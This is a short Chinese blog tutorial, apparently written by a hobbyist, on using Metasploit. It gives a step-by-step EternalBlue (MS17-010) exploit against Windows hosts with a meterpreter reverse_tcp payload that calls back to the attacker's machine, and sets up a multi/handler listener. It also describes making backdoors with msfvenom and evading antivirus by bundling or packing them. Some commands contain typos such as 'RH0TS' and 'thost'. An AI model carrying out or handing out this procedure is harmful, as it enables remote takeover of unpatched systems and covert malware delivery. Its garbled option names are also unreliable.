secure
- 一、基本工具
- 1、metasploit framework
ps.本着兴趣爱好,加强电脑的安全防护能力,并严格遵守法律和道德规范。
一、基本工具
1、metasploit framework
msf(metasploit framework)是一个开源的渗透测试框架,用于开发、测试和执行各种网络安全攻击。metasploit framework提供了大量的渗透测试工具、漏洞利用模块和负载模块,可以用于发现系统中的漏洞、测试系统的安全性,并进行攻击和漏洞利用。它支持多种操作系统,包括Windows、Linux和Mac OS X。
msf使用法则:使用模块->配置模块必选项->运行模块
msfconsole //进入msf控制台,以使用模块(推荐root权限) >>>进入msf //1、使用模块 search 关键词 //搜索模块 use 模块编号/绝对路径 //使用模块 >>>进入模块 //2、配置模块必选项 show options //显示配置选项 set 选项名称 值 //3、运行模块 run
举例:metasploit攻击永恒之蓝(后门)
1、有此漏洞的目标主机
//1、使用模块 use exploit/windows/smb/ms17_010_eternalblue //2、设置必选项 //查看必选项[*required为yes的就是必选项] show options set RH0TS 192.168.1.128 //[RHOSTS:为target host(s)代表你要攻击谁] set payload windows/x64/meterpreter/reverse_tcp //[payload,是攻击载荷,就是攻击完成后想干啥,这里是想获取meterpreter][meterpreter相当于内部策反的间谍,提供远程控制功能。] set LHOST 192.168.1.136 //[LHOSTS为listen host代表你是谁,既Kali的IP地址] set LPORT 12345 //[LPORT:为listen port,代表你要在kali上开启的端口,1-65535随便选,但不能被占用] 3、运行 run 4、进入目标主机 >>>meterpreter help //从帮助里看看能对目标主机干什么
2、无此漏洞的目标主机(常用)
没有漏洞就得拍个间谍过去,把后门打开。
2.1 目标主机的间谍软件:msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线,更容易策反meterpreter,图中是windows,此外,还能直接修改为linux、OSX的后门软件。[*msfvenom在shell里使用,不是msfconsoles终端]
避开杀毒软件
方法一:和正常软件捆绑
方法二:给辅助软件加壳
自行寻找
2.2 本地主机的接应程序:
use exploit/multi/handler //攻击多目标载荷模块 set payload windows/x64/meterpreter/reverse_tcp//设置载荷 set thost 192.168.1.136 set lport 9999 run
- 1、metasploit framework
猜你喜欢
网友评论
- 搜索
- 最新文章
- 热门文章